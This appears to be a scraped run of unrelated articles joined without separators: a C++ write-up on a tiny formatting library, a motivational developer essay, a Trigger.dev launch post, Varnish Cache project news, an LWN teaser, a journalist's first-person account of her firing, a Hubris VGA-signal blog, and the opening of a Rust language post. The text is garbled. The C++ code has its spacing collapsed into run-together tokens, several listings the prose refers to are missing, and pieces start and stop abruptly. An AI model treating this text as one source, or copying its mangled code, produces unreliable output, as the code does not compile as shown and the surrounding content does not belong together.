The end result came out really compact, at only 65 lines of code—providing a skeleton that can be supplemented with additional functionality at low cost.
Usage
Given a format buffer…
charbuffer[64];String_Bufferbuf= {str,sizeofstr};
…the
fmt::format
function provided by this library can be called with a format string parameter, containing the character sequence
{}
(a
hole
) where parameters are to be substituted, as well as the parameters themselves.
In case the buffer is not sufficiently large to contain the full string, the function writes as many characters as it can, and sets the
String_Buffer
’s
len
variable to the amount of characters required.
That way, it is possible for the caller to tell if the buffer has been exhausted, and reallocate it to an appropriate size.
Additional functions can be written on top of this base functionality to improve ergonomics in real-world code.
These are included in
Ergonomic functions
.
Problem statement
A string formatting library consists of a single function
format
.
You give the function a
format string
, which describes the output shape, as well as a set of
format parameters
, which the function then substitutes into the format string, rendering them in a human-readable way.
The
format
function ought to write to a pre-allocated buffer of characters.
This is a choice made in favour of simplicity: writing to a pre-allocated buffer can fail, but compared to arbitrary I/O, there is only one failure mode: the buffer is exhausted.
Naturally, this cannot work in memory-constrained environments, such as embedded devices—where you would want to write to a small buffer and flush it in a loop to reduce memory usage—but this does not apply in the context of a desktop video game.
As already mentioned in the usage overview, if the buffer is full, the function should return the number of characters that
would
have been written, had the buffer capacity not been exceeded—such that the caller can choose to reallocate the backing buffer to an appropriate size, and try formatting again.
There
has
to be a format string.
An example of a format string-less API is C++’s
<iostream>
.
Instead of having a format string like
printf
,
<iostream>
opts to use overloads of
operator<<
to write to the output.
This has the disadvantage of not being greppable (which is useful for debugging error logs), as well as not being localisable (because there is no format string that could be replaced at runtime).
Additionally, I don’t want the format string to have extra specifiers such as C’s
%d
,
%x
, etc. specifying the type of output, or Python’s
{:.3}
, for specifying the style of output. The C approach is error-prone and inextensible, and the Python approach, while convenient, increases parser complexity and reduces greppability.
Instead, the representation is defined only according to the formatted value’s type.
It has to have a small footprint.
There exist plenty of string formatting libraries for C++, such as
{fmt}
, or even the recently introduced
std::print
, but they suffer from gigantic compile-time complexity through their heavy use of template metaprogramming.
While my compilation time benchmark results for {fmt} weren’t as dire as those presented
in their README
, they still don’t paint a pretty picture—with a simple program using
printf
taking ~35 ms to compile, and the equivalent program using {fmt} taking ~200 ms.
I also find the benefits of an open rather than closed API, as well as compile-time checked format strings, dubious. Instead, I want something lean and small, using basic features of the language, and easy enough to drop into your own project, then extend and modify according to your needs—in spirit of
rxi’s simple serialisation system
.
We will start by defining the
String_Buffer
type, which also serves as the formatter’s state.
It represents a user-provided string buffer with a capacity and a length.
A
String_Buffer
is intended to be initialised via aggregate initialisation (
{str, cap}
.)
This mimics the
snprintf
API, which accepts its buffer and size arguments in the same order.
At the core of the library’s output is
write
.
It performs a bounds-checked write of a string with known length to the output string buffer.
voidwrite(String_Buffer&buf,constchar*str,intlen)
{
intremaining_cap=buf.cap-buf.len-1;// leave one byte for NULintwrite_len=len>remaining_cap?remaining_cap:len;if (write_len>0)
memcpy(buf.str+buf.len,str,write_len);buf.len+=len;
}
My implementation truncates the output if the buffer size is exhausted, but keeps incrementing the buffer’s
len
past
cap
, such that the caller can know the full number of characters written after all
write
s, and adjust accordingly.
This is a deliberate choice coming from the fact that
String_Buffer
does not own the buffer’s allocation, and the fact that string formatting is a performance-sensitive piece of code, which will be called often in the game loop.
However, it is trivial to replace the length saturation logic with a call to
realloc
, should that be the more appropriate choice.
Having this base
write
function, we can implement a set of overloaded functions that will write out values of various types to the string buffer.
These functions will be used by our
format
function, to write out format arguments.
The set of functions implemented here directly corresponds to the types of arguments you’ll be able to pass into
format
.
Format strings can be defined as a sequence of
literals interspersed with arguments
.
That is, a format string always takes the form:
fstr= { literal,hole },literal;
The leading and trailing
literal
can be the empty string.
The task of processing the literal parts is done by a function called
next_hole
.
It parses the format string, looking for a character sequence representing a hole
{}
, and writes the string preceding the hole
{}
to the output buffer.
fstr
is received as a reference to a pointer, representing the format string’s parsing state.
A call to
next_hole
will write out the literal part, visualised with
---
, and leave the
fstr
pointer past the hole
{}
, visualised with
^
.
Hello, {}!
------- ^
In this case, it will return
true
to signal that it stopped at a hole.
In case there is no hole however, and the end of the string is reached, it will return
false
.
Hello, {}!
-^ end of string
Additionally, we handle the
{{
escaping case.
when
{
is encountered directly after another
{
, we have to flush the current literal, and start a new one directly after the first
{
. Underlined with
---
are the spans of characters that get written to the output.
empty {{} hole
------- ------
Finally, we define
format
: the function that accepts a format string, a set of arguments, and inserts them into the output string.
It makes use of an additional function
format_value
, which tries to find the next hole, and if found, writes out a format argument in its place.
For those unfamiliar with C++ template metaprogramming,
(format_value(buf, fstr, args), ...)
is a
fold expression
.
Given any number of
args
, it will expand into a sequence of calls to
format_value
, one for each element in
args
, separated by the
,
operator. For example, if two arguments: a
const char*
and an
int
, are passed into
format
:
Note that the overloads of
write_value
must
be declared before
format_value
.
This is because the
write_value
name is not dependent on any template arguments, and is therefore early-bound at
format_value
’s definition site.
This choice was made for the sake of simplicity, but if it turns out to be a problem, it is possible to use specialisation. It is important to note though that specialisation bypasses overload resolution, so this will not work:
because the type of
"world"
is
char [5]
, and not
const char*
, and
write_value<char [5]>
is deleted.
This should be solvable with some additional work, but I’ve deemed it unnecessary in my case.
In a single .cpp file, together with wrapping all the functionality in a namespace, this implementation, together with the implementation of
write_value
for strings, equates to a mere
65 lines of code
.
In a real project, you will probably want to move some of the private implementation details to a separate .cpp file.
Here’s the full source code listing, split into a header file, and an implementation file.
The choice of
{}
as the hole syntax is not accidental.
I evaluated whether holes could be represented with a single character
%
, like:
fmt::format(buf,"Hello, %!","world");
But it turned that using only a single character introduces an ambiguity around escaping.
What should this format to:
hello%
, or
%hello
?
fmt::format(buf,"%%%","hello");
It would be possible to use a different, unambiguous combination for escaping, such as
%_
, but it looks very alien, and you have to use it any time you want a
%
sign.
fmt::format(buf,"%%_ complete",33);
Compare this to the current approach, where you only have to double the
{
when it’s directly preceding
}
.
fmt::format(buf,"{}% complete",33);
It also more closely mimics the final output string.
Reading the previous
%%_
example requires knowing that
%_
is a special sequence that turns into
%
, whereas reading this example doesn’t require any extra knowledge (and progress reporting with percentages is a somewhat common use case for format strings).
Iteration through parameter packs
Another idea I had was to do an
<iostream>
-style API, though done with a function call rather than an operator chain:
format(buf,"Hello, ","world!");
The observation about poor greppability didn’t occur to me until later, but it seemed simple enough to implement.
If I went with this approach, it would be even less code, but the poor greppability and non-localisability of format strings kept bugging me, so I stared wondering if there’s some way to add that format string.
It seemed impossible, because the format string can be provided at runtime.
This would mean
format
would have to iterate through the format string to parse out the holes
{}
, and when a hole is hit, insert the Nth parameter, starting with 0 for the first hole, N for the last hole.
But it
seemed
to require indexing the parameter pack, and
there is no way to index a parameter pack in C++20,
there is no way to index it using a runtime value in C++26, which adds parameter pack indexing
pack...[x]
.
A few hours later, I realised it is possible to have
the parameter pack expansion drive the parsing
, rather than driving the parsing from
format
and trying to index the parameter pack.
I think this is single-handedly the most elegant bit of this library.
It generates optimal, extremely minimal code: a sequence of calls to the appropriate overloads of
format_value
.
It handles out-of-bounds gracefully: because there is no indexing of parameters, and therefore no out-of-bounds.
It makes me wonder what other cool things could be done with this technique.
Failed idea: using dynamic typing for format arguments
My initial idea for a minimal C++ formatting library involved a
Format_Argument
type, passed in an
std::initializer_list
to the
format
function.
The API was shaped like this:
This approach has a couple problems though, which were enough of a deal breaker for me that I dropped the idea.
Efficiency.
The size of
Format_Argument
is as large as the biggest value able to be formatted.
In this case, assuming
Vec4
is four 32-bit floats, it is 20 bytes.
This space has to be allocated on the stack for the
initializer_list
.
It is unlikely compilers would be able to optimise all that away, especially if the
format
function lived in a separate object file.
Verbosity.
The example above is actually incomplete.
What
Format_Argument
has
to look like is actually this:
And then you have to
switch
on the format argument’s
type
in
format_value
, introducing further duplication.
Why not
printf
The elephant in the room.
Why do this when you have
printf
?
The answer to this is: verbosity.
Firstly, there is no way to extend
printf
with your own types in standard C.
I often want to
printf
3D vectors for debugging, and I have to resort to listing out all the axes manually.
Combine this with the inability to use
printf
as an expression, which is particularly painful with ImGui—where I often want to format a window title, or button label.
It is possible to write a function which allocates the temporary buffer and writes to it in one go, akin to
my
fmt::print
function
, but even doing
that
is verbose, as you have to deal with
va_list
—therefore needing two sets of functions, one for variadic arguments
...
and one for
va_list
.
printf
is also error-prone.
It is easy to mess up and use the wrong specifier type, or pass too few arguments to the function.
printf("%x",1.0f);// oopsprintf("%x");// ...not again
This makes it unusable for localisation purposes.
There is also no easy, idiomatic way to concatenate strings written with
snprintf
.
This naive way is not actually correct, because
snprintf
returns the number of characters that
would
be written into
str
, had the buffer been large enough.
Therefore, the second call to
snprintf
in the above example ends up writing past the buffer’s bounds (at index 6.)
Since the base library is very bare-bones, I’m including some additional snippets to help you get it integrated into your project.
For integers, here’s an implementation of
write_value
for
int64_t
.
This can confuse C++’s overload resolution, so I’d recommend adding additional overloads for smaller integers
int8_t
,
int16_t
,
int32_t
, also
long long
, and
ptrdiff_t
, calling into the
int64_t
overload.
A
uint64_t
version can be created in a similar manner, by removing the
if (value < 0)
case near the beginning.
This algorithm works for any radix (base 2, base 8, base 16, …).
In my own implementation, I have a
Format_Hex
newtype, which changes the output to base 16.
For floats, I defer the work onto
snprintf
’s
%g
specifier, because I trust it to do a better job than I ever could, even if a bit slow.
You can also use
Ryu
for this purpose.
The ergonomics of having to allocate a backing buffer, and then a
String_Buffer
afterwards, can get a bit cumbersome.
To help alleviate this, I have a
Static_String
type, together with a
print
function, which formats to a
Static_String
and returns it:
We are all moved by great movies, cinematography, and stories. Watching them is fun because you can imagine yourself resonating with a character. You are thrilled by the tension the story creates and curious how it will be resolved.
Many find software development a dull job where you have to write exactly what your PM or client asks for. It’s exciting at first, but it can become boring after a few iterations.
Whatever doesn’t excite you, change it.
When we, as developers, push ourselves to be protagonists, we discover many problems to solve — a lot of tension to resolve. Here are a few good problems for everyday devs:
Your CI/CD takes a huge amount of time because you forgot to leverage caching.
You forgot to add connection pooling and your service bombarded the database, causing too many open connections.
You misconfigured the garbage collector and now you have a memory leak that keeps growing.
If it takes you more than 3 seconds to understand what you wrote last week, it’s poorly written.
Latency is high for your users in Mumbai because your servers are in Singapore.
The database becomes very slow when you start dumping data in batches.
You want consistent API responses for read operations for users in both Mumbai and Singapore.
These are not trivial problems; they happen every day. These are our villains — irritating, unwanted, and surprising. We should eliminate them.
Pick your fight. This is one way to make your day exciting. If you can’t tackle these at work, do it in your personal projects.
If you chase the right tension, a story will follow.
Launch HN: Trigger.dev (YC W23) – Open-source platform to build reliable AI apps
We provide everything needed to create production-grade agents in your codebase and deploy, run, monitor, and debug them. You can use just our primitives or combine with tools like Mastra, LangChain and Vercel AI SDK. You can self-host or use our cloud, where we take care of scaling for you. Here’s a quick demo: (
https://youtu.be/kFCzKE89LD8
).
We started in 2023 as a way to reliably run async background jobs/workflows in TypeScript (
https://news.ycombinator.com/item?id=34610686
). Initially we didn’t deploy your code, we just orchestrated it. But we found that most developers struggled to write reliable code with implicit determinism, found breaking their work into small “steps” tricky, and they wanted to install any system packages they needed. Serverless timeouts made this even more painful.
We also wanted to allow you to wait for things to happen: on external events, other tasks finishing, or just time passing. Those waits can take minutes, hours, or forever in the case of events, so you can’t just keep a server running.
The solution was to build and operate our own serverless cloud infrastructure. The key breakthrough that enabled this was realizing we could snapshot the CPU and memory state. This allowed us to pause running code, store the snapshot, then restore it later on a different physical server. We currently use Checkpoint Restore In Userspace (CRIU) which Google has been using at scale inside Borg since 2018.
Since then, our adoption has really taken off especially because of AI agents/workflows. This has opened up a ton of new use cases like compute-heavy tasks such as generating videos using AI (Icon.com), real-time computer use (Scrapybara), AI enrichment pipelines (Pallet, Centralize), and vibe coding tools (Hero UI, Magic Patterns, Capy.ai).
Here’s a sneak peek at some upcoming changes: 1) warm starts for self-hosting 2) switching to MicroVMs for execution – this will be open source, self-hostable, and will include checkpoint/restoring.
We’re excited to be sharing this with HN and are open to all feedback!
This coming february 22nd, The Varnish Cache Project will officially
be 20 years old. We consider the first surviving commit from the
subversion-to-git conversion the official birthday of the Project.
This is as good as any excuse to take stock and make some changes
so we are ready for the next 20 years.
Open Source is not what it used to be: The EU has launched a
broadside of directives against software related industries, and
while they have gone to great lengths to carve out a niche for Free
and Open Source Software, they have wisely not chosen to make it a
“Get out of jail for free” card to slap “FOSS” sticker on something.
Concepts like “Maintainers”, “Stewards” and “Contributors” of FOSS
have formal legal definitions now, and we need to find out how we
can and want to fit in.
Which again means we have to find out who makes that kind of decisions
for the project, both now and in the future.
Many successful FOSS projects have spawned “Foundations” which are
typically tax-exempt benefical/charity corporations in some country
or other, but we have decided to not go there. For one thing, none
of us want to take on such a task, but more importantly: We’re are
less than impressed by how well that model seems to work in practice.
We will instead form a voluntary association, a “Forening”, under
the laws of Denmark, with bylaws that set out what the goal is
(develop, maintain and distribute the software), who gets to make
the decisions (a governing board appointed by the members), who can
become members (anybody but subject to approval by the members) and
that the association cannot ever hold or handle any money.
The commented bylaws of the association will be ratified by the
founders and made public this autumn, and the first general assembly
will be on Monday February 23rd 2026 - hopefully with many membership
applications to approve - more about that when we publish the bylaws.
We will also, at the same time, reluctantly change the name of the project.
The Varnish Cache FOSS software was initiated and sponsored by the
Norvegian newspaper Verdens Gang. They hired a company called
“Linpro” to handle the logistics and me to write the code.
From Linpro grew the company Varnish Software, and if anybody had,
they had earned the right to use “Varnish” in their name commercially.
I was deeply worried about the potential for confusion and line
drawing issues between the commercial entity and the FOSS project,
and as Varnish Software have grown to become a huge international
company, those worries materialized.
I thought I had an verbal agreement with them, that “Varnish Cache”
was the FOSS project and “Varnish Software” was the commercial
entitity, but the current position of Varnish Software’s IP-lawyers
is that nobody can use “Varnish Cache” in any context, without their
explicit permission.
The need to get permission from Varnish Software to use our own
name has already caused some potential contributors and supporters
from engaging with the FOSS project.
We have tried to negotiatiate with Varnish Software for many months
about this issue, but their IP-Lawyers still insist that Varnish
Software owns the Varnish Cache name, and at most we have being
offered a strictly limited, subject to their veto, permission
for the FOSS project to use the “Varnish Cache” name.
We cannot live with that: We are independent FOSS project with our own name.
So we will change the name of the project.
The new association and the new project will be named “The Vinyl
Cache Project”, and this release 8.0.0, will be the last under the
“Varnish Cache” name. The next release, in March will be under the
new name, and will include compatility scripts, to make the
transition as smooth as possible for everybody.
I want to make it absolutely clear that this is 100% a mess of my
making: I should have insisted on a firm written agreement about
the name sharing, but I did not.
I will also state for the record, that there are no hard feelings
between Varnish Software and the FOSS project.
Varnish Software has always been, and still is, an important and
valued contributor to the FOSS project, but sometimes even friends
can make a mess of a situation.
On behalf of the Varnish Cache Project,
Poul-Henning Kamp
2025-08-20 - New releases: 7.7.3, 7.6.5 and 6.0.16
¶
Celebrating the 18th anniversary of Varnish-Cache and the first
anniversary of the
SLASH/
storage engines today, your Open-Source
Varnish-Cache friends from
UPLEX
have just tagged the first version
1.0.0 candidate of our extension with storage engines (stevedores) and
storage routers (loadmasters).
Over the past year, we have received a lot of helpful input from our
users and have implemented substantial improvements. THANK YOU to
everyone who has contributed by reporting issues, providing feedback
and, just recently, adding documentation. SLASH/fellow has also helped
improve Varnish-Cache itself.
After rigorous testing in particular over the past weeks, we now
boldly claim that SLASH/ deserves a 1.0 version tag.
The 7.1 series is no longer supported in any capacity.
2023-02-06 - Two new Storage Engines for Varnish-Cache
¶
Celebrating the 17th anniversary of Varnish-Cache today, your
Open-Source Varnish-Cache friends from
UPLEX
have just released an
extension with two new storage engines (stevedores) and two basic
storage routers (loadmasters). One of the storage engines,
fellow
,
offers persistent storage on disks (or SSDs, rather).
we have released a Varnish Delivery Processor (VDP) for parallel ESI processing,
which can deliver relevant speedups where portions of ESI-processed objects are
not served from cache.
This combined maintenance and security release is recommended for all
users of the 6.0 LTS and contains several bug fixes, improvements and new
features. More information is available in the
Change log
2021-03-16 - Denial of Service in varnish-modules
¶
Some versions of the separate
varnish-modules
bundle allow for a
potential denial of service attack when the
header.append()
or
header.copy()
functions are used.
This maintenance release is recommended for all users of the 6.0 LTS
and contains several bug fixes, improvements and new features. More
information is available in the
Change log
When preparing the 6.5.0 release, it was forgotten to bump the
VRT_MAJOR_VERSION number defined in the
vrt.h
include file. This major
version bump is needed due to the API and ABI changes as part of the
release, to make sure that VMODs are not allowed used if they were
compiled for the wrong Varnish version.
The official Linux (apt/yum) package repositories are now located
at Packagecloud.io.
A list of all available repositories can be found at:
https://packagecloud.io/varnishcache
You can access the varnish-cache homepages with HTTP or HTTPS as you
like.
We save the logfiles from our Varnish instance for a limited period,
in order to be able to debug problems.
We do not use any external trackers and do not analyze traffic.
[$] New kernel tools: wprobes, KStackWatch, and KFuzzTest
Linux Weekly News
lwn.net
2025-09-15 16:14:27
The kernel runs in a special environment that makes it difficult to use
many of the development tools that are available to user-space developers.
Kernel developers often respond by simply doing without, but the truth is
that they need good tools as much as anybody else. Three new tools for the
tra...
Reader subscriptions are a necessary way
to fund the continued existence of LWN and the quality of its content.
If you are already an LWN.net subscriber, please log in
with the form below to read this content.
Please consider
subscribing to LWN
. An LWN
subscription provides numerous benefits, including access to restricted
content and the warm feeling of knowing that you are helping to keep LWN
alive.
(Alternatively, this item will become freely
available on September 25, 2025)
The Washington Post Fired Me – But My Voice Will Not Be Silenced
Democracy Dies in Darkness, but some of us will still carry on the light.
Last week, the Washington Post fired me.
The reason?
Speaking out against political violence, racial double standards, and America’s apathy toward guns.
Eleven years ago, I joined the Washington Post’s Opinions department with a simple goal: to use journalism in service of people.
I believed in using the pen to remember the forgotten, question power, shine light in darkness, and defend democracy. Early in my career, late Washington Post editorial page editor Fred Hiatt told me that opinion journalism is not just about writing the world as it is, but as it should be. He told me we should use our platform to do good. That has been my north star every day.
As the founding Global Opinions editor, I created a space for courageous, diverse voices from around the world — especially those exiled for speaking the truth. I was inspired by their bravery. When my writer, Global Opinions columnist Jamal Khashoggi was brutally murdered by Saudi Arabia regime agents for his words, I fought loudly for justice for years, putting my life and safety on the line to pursue accountability and defend global press freedom. For this work, I was honored with global recognition,
prestigious awards
and proximity to the world’s most powerful people.
David Ignatius and I receiving the George Polk Award, in 2019 for commentary on Jamal Khashoggi’s murder.
In the aftermath of Jamal Khashoggi’s murder. Seated next to Jeff Bezos at the 2019 Gridiron Dinner.
As a columnist, I used my voice to defend freedom and democracy, challenge power and reflect on culture and politics with honesty and conviction.
Now, I am the one being silenced - for doing my job.
On Bluesky, in the aftermath of the horrific shootings in Utah and Colorado, I
condemned America’s acceptance of political violence
and criticized its ritualized responses — the hollow, cliched calls for “thoughts and prayers” and “this is not who we are” that normalize gun violence and absolve white perpetrators especially, while nothing is done to curb deaths.
I expressed sadness and fear for America.
My
most widely shared thread
was not even about activist Charlie Kirk, who was horribly murdered, but about the political assassinations of Minnesota lawmaker Melissa Hortman, her husband and her dog. I pointed to the familiar pattern of America shrugging off gun deaths, and giving compassion for white men who commit and espouse political violence.
This cycle has been documented for years.
Nothing I said was new or false or disparaging— it is descriptive, and supported by data.
I did my journalistic duty, reminding people that despite President Trump’s partisan rushes to judgement, no suspect or motive had been identified in the killing of Charlie Kirk — exercising restraint even as I condemned hatred and violence.
My journalistic and moral values for balance compelled me to condemn violence and murder without engaging in excessive, false mourning for a man who routinely
attacked Black women
as a group, put academics in danger by
putting them on watch lists
, claimed falsely that Black people were
better off in the era of Jim Crow
, said that the
Civil Rights Act was a mistake
, and favorably reviewed a book that c
alled liberals “Unhumans
”. In a since-deleted post, a user accused me of supporting violence and fascism. I
made clear
that not performing over-the-top grief for white men who espouse violence was not the same as endorsing violence against them.
My only direct reference to Kirk was one post— his own words on record.
My commentary received thoughtful engagement across platforms, support, and virtually no public backlash.
And yet, the Post accused my measured Bluesky posts of being "unacceptable”, “gross misconduct” and of endangering the physical safety of colleagues — charges without evidence, which I reject completely as fals
e. They rushed to fire me without even a conversation. This was not only a hasty overreach, but a violation of the very standards of journalistic fairness and rigor the Post claims to uphold.
I was the last remaining Black full-time opinion columnist at the Post, in one of the nation’s most diverse regions. Washington D.C. no longer has a paper that reflects the people it serves. What happened to me is part of a
broader purge of Black voices from academia, business, government, and media
— a historical pattern as dangerous as it is shameful — and tragic.
I am proud of my eleven years at the Post. Beyond awards and recognition, the greatest honor has been working with brilliant colleagues and connecting with readers and writers around the world. To all who have supported me, read me, even those who disagreed with me— I say, thank you. You’ve made me a better writer, thinker, and person.
But this is not the end of my work. I still believe in the power of the pen. My values have not changed.
Freedom from censorship, especially on talking about race, is why I launched the
Resistance Studies Series
, beginning with my independent online course
Race, Media, and International Affairs 101
. I created this course after Columbia’s School of International and Public Affairs c
ut funding for my Race and Media class
. This summer, we sold out all 500 spots and funded more than 40 scholarships.
A while ago I got a ST Nucleo-H753ZI evaluation board because I wanted to try out Hubris, Oxide's embedded operating system.
After getting the basic demo app with the blinking lights running I set it aside for a lack of an idea what to do with it.
A few weeks ago I was looking through old Raspberry Pi accessories on the hunt for a project.
What stuck out to me wasn't any of the Raspberry Pi stuff, but the old 4 by 3 VGA monitor I had standing around.
Could I just wire those pins in the VGA cable up to the GPIOs and produce a signal?
As it turns out, yes you can just do that.
Getting Rid of the Sys Task
In the beginning I thought I was gonna be changing the GPIO pins from normal code, so switching them
on and off at very high speeds.
In hubris there's a
stm32xx-sys
task that normally controls the GPIO pins and also handles
enabling clock to the different components through the Reset and Clock Control (RCC) block.
So normally if you want to set a GPIO pin you'd send a message to the
sys
task and it would do
that for you.
I was worried that the overhead of the context switching was gonna be a problem there.
So I decided to get rid of the sys task and do it all in my task.
The Plan
My first plan was to get the screen to just display a single color.
I thought that it would be enough to get the vsync and hsync signals right and then just have the
green pin high all the time to get a green picture.
Mapping the Registers
The peripherals of our chip are all controlled with registers.
Those are memory mapped and to certain addresses.
There is a gigantic 3000 page reference manual that describes all those registers.
It's all very overwhelming.
Luckily there's a Peripheral Access Crate (PAC) that defines an API for reading and writing those registers.
Since we're running under memory protection we need to first make sure we can actually write to those registers.
In Hubris that sort of thing happens in an
app.toml
where all the tasks for an app are defined.
In this case the
tim3
memory region wasn't a thing the Hubris build system knew about yet.
The regions you can
use
there are defined in a
chip.toml
for the specific chip you have.
In our case that's
chips/stm32h7/chip.toml
.
[tim3]
address = 0x40000400
size = 0x400
You get those values from a fun table called "Register boundary addresses" from the manual.
Blinking an LED with a Timer / PWM
The timers on this chip have a Pulse-Width-Modulation (PWM) feature which we should be able to use to generate the VGA sync signals.
But the first step was to get a light blinking using PWM.
The basic Hubris demo app does have a blinking LED, but that's not using PWM.
Instead it uses the timer feature of the kernel, which makes a lot of sense for a Hubris demo, but we want to involve the CPU as minimally as possible for generating the signal.
My initial plan was to measure the PWM with my multimeter to see it working.
I chose PB0 for this from the pinout table in the user manual of the board (which is different from the reference manual of the chip).
PB0 is hooked up to timer 3, channel 3 (TIM3_CH3).
Looking at the "Solder bridges and jumpers" section I found out that that's also connected to an LED on the board by default, so I chose to just test it that way.
By default here means that there's a bunch of predefined places on the bottom of the board where you can make connections by adding a bit of solder or remove connections by cutting traces or removing zero ohm resistors.
So after a whole bunch of fiddling I got all the registers set up right to get the LED blinking.
Setting up the H-Sync and V-Sync Timers
The first thing I sort of used for some guidance was this site where someone had done a similar project:
https://www.programmerall.com/article/26476558/
That was pretty useful for the wiring itself and a basic understanding of how the signal works.
The basic idea is that there's three pins for red, green and blue and two pins for horizontal and vertical sync.
The horizontal sync signal needs to be on for a bit between each line of pixels and the vertical one between frames.
You can connect any of the color that you don't need to display to ground.
To connect the end of the cable to the GPIO headers on the board I ended up using some jumper wires and a breadboard.
(The breadboard is just for all the things connected to ground.)
I could take off black plastic cover on the end of the jumper wires and clip off the pointy end.
That left a sort of hollow bit that I could wrap some electrical tape around and stick onto the pins of the VGA cable.
The connection is a bit loose, but it makes contact.
Before that I had tried soldering and that was a horrible idea because I don't have enough hands to hold the soldering iron, the solder and the jumper.
Then there's this site which has timing information for all the different resolutions:
http://www.tinyvga.com/vga-timing
At first I chose 640×480 because I wanted a minimal pixel count.
I got that sort of working to the point where the monitor would recognize a signal, but it would need a bit of time to auto-adjust.
I then decided I'd switch to 800×600 like they did in the link above, because those numbers add up much nicer:
http://www.tinyvga.com/vga-timing/800x600@60Hz
Each timer has a prescaler that can be used to divide the base clock, which is 200 Mhz in our case.
The timer will then count up until it reaches the value in the auto-reload register (ARR).
Then there's also the capture/compare register (CCR), which determines for which part of the cycle the output is on when doing pulse-width modulation.
For hsync I set the prescaler to zero, meaning the frequency is divided by one, because that register is offset by one.
Then I set the ARR to 5279 (also offset by one) and the CCR to 640 (not offset by one).
That means the timer counts up 200 times per microsecond.
5280 / 200 gives us the 26.4 µs that we need for one line and 640 / 200 gives us the 3.2 µs for the sync pulse.
For vsync I set the prescaler to 21119.
21120 / 200 gives us 105.6 µs, which is the width our sync pulse should be.
So then we can set the CCR to 1.
The ARR is set to 156 to give us 105.6 µs * 157 = 16.5792 ms, which is exactly the time a whole frame should take.
All Green all the Time Not Working
My hope was that I could get to a fully green picture pretty easily by just hooking up the green pin to a GPIO pin that was on.
That ended up not working, I suspect because the monitor uses the voltage that's on the color pins during the h-sync as a baseline or something like that.
DMA to the DAC
The next plan was to continuously repeat a single line.
I decided to try to use the Digital-to-analog converter (DAC) for this.
The basic way the DAC works is that you first need to set a GPIO pin that's hooked up to the DAC into an analog mode.
This isn't one of the altenate functions like you'd use for the timer, but a whole separate mode.
Then there's a data holding register you can write an 8 or 12 bit value into.
That will determine the output voltage you get on the pin.
Now, we don't want to keep the CPU fully occupied with constantly setting that register, so we need a better solution.
Luckily the h7 has dedicated units for copying memory around.
There's actually at least four different kinds of these, but we'll start with a "normal" direct memory access controller (DMA).
There's two of those, but well use DMA1.
When I wanted to map the DAC control registers into my task I got a build error.
As it turns out, the memory protection unit only supports eight memory regions at a time, meaning per-task in Hubris.
I resolved that by grouping some timers together.
They also need to have a power-of-two size and be aligned to their size, which would lead to problems later when I tried to group more things together, but it worked out for the timers.
What I ended up doing here is to hooking up the timer to the DAC and configuring the DMA request multiplexer (DMAMUX) to be triggered by the DAC.
Then I set up the DAC in circular mode with a pointer to a buffer.
Eventually I got it looking like that (with a lot of flickering of course):
Now that wasn't looking very much like the data that I wanted to DMA into DAC.
It was also changing quite a bit based on what exactly the code around it did (like adding something do a debugging ringbuffer).
It appears that the DMA unit doesn't go through the CPU caches, so likely this was some random data.
After some digging I found out that there's different kinds of memory on this chip that are configured differently in Hubris.
You can see that configuration in
chips/stm32h7/memory-large.toml
.
Among others there's a
dma
flag that can be set for a region.
I'm not sure what that does exacly (it looks like one thing is that the kernel will refuse to copy
from or to there), but putting my buffer there using the
link_section
attribute seems to make our DMA work.
After I got that to work all that was left was a lot of confusion because I had gotten the math for the pixel timing wrong.
But after I had figured that out I was able to produce a nice gradient.
(If you're confused about the color: I had switched to blue instead of green at some point.)
Switching between on and off pixels leads to a pattern like this:
The DAC seems unable to produce sharp edges and also the average output seems to get higher after switching on and off a couple of times.
Here
they used the SPI hardware support to produce an image, so maybe I should try that next as well.
Return of the Sys Task
The next thing I wanted to do of course was to produce an actual 2 dimensional image.
So far the CPU hadn't been involved after setting up the registers.
The DMA would keep going even if the CPU was halted.
This starts to become a problem for a 2D image though.
If we were to keep our circular mode buffer and wanted to store a whole image in it we'd need a bunch of bytes for that.
While we can horizontally repeat the same pixel 8 times (by decreasing the timer frequency), we can't do that vertically.
So we'd need 132 (1056 / 8) × 628 = 82896 bytes for that buffer.
That would fit into one of the sram regions, but it's a bit of an inconvenient format for a framebuffer with vertical pixels being 8 times smaller than horizontal ones.
Luckily there's the master direct memory access controller (MDMA), which can be triggered by the completion of other DMA controllers and supports much more complex
configuration.
But at this point I was definitely out of regions that could be mapped to my task.
Since it was very clear at this point that we weren't goint to do high speed GPIO toggling on the CPU we could actually re-introduce the
sys
task.
This means that we could get rid of two regions from our task (RCC and GPIO) and we'd have space for the MDMA control registers.
It's kind of funny how this hardware limitation can encourage splitting things into different tasks.
I was able to get the MDMA copying into the DMA buffer, but I haven't quite been able to get a framebuffer working yet.
So this is the end of this post.
I hope I'll find some more time for this project soon and I'll try to make another post if I get something more interesting going.
I already have some ideas about what to do with a working framebuffer.
In my
previous blog post, about scoped generics
, I
identified a problem with the Rust programming language that couldn't properly
be solved by existing programming techniques, implying that a new language
feature was needed. As such, I've been intending to officially propose that
scoped generics should be added to Rust. This blog post isn't primarily about
the particular new feature itself: rather, it's partially about the process of
working out the details of a new feature in general, but primarily about some
interesting things I discovered along the way.
I care a lot about getting the details right for my new feature, both because it
increases the chance that the feature will be accepted, and because it increases
the chance that the feature will be useful if it is accepted. The Rust language
design team are frequently in a similar situation, and in order to try to get
the details of new features right, they use an
"experimental feature
gate"
process that lets
them implement something experimentally to find out whether or not it's a good
idea and what the details should be. I'm not an experienced Rust contributor,
so I don't get to use that process myself: but that doesn't mean that I can't
try to do something similar on my own. It should be possible to learn lessons
from trying to implement something whether or not the implementation is in the
official Rust compiler repository!
As such, I've already started on an experiment into implementing scoped
generics. It isn't completed yet, but it's already taught me things, not just
about scoped generics, but about Rust in general. And one of those insights
about Rust in general seemed both fundamental enough, and surprising enough, to
make me stop what I was doing and write this blog post instead.
The insight is about a phenomenon that will be very familiar to most Rust
programmers: "a large proportion of the functions, methods, and even sometimes
types in the Rust standard library have to be written twice: one version that is
or operates on shared references, and one version that is or operates on mutable
references", and comes in two parts:
For functions/types/methods that do have to be written twice, there is a
mechanical translation that can be used to produce the "shared reference"
version based on the "mutable reference" version; and
The translation in question has a well-established mathematical structure:
it follows the type theory of linear logic (a mathematical tool invented in
1987 and that has frequently been used since to explain programming language
type systems). But this isn't the normal programming-language use of linear
logic: most programming language type theories are limited to a "fragment"
of linear logic that contains some of the operations and not others, and the
translation in question falls outside the commonly used fragments.
My primary aim with writing this blog post is to try to explain: a) the relevant
parts of Rust, b) all the relevant parts of linear logic (which is almost all of
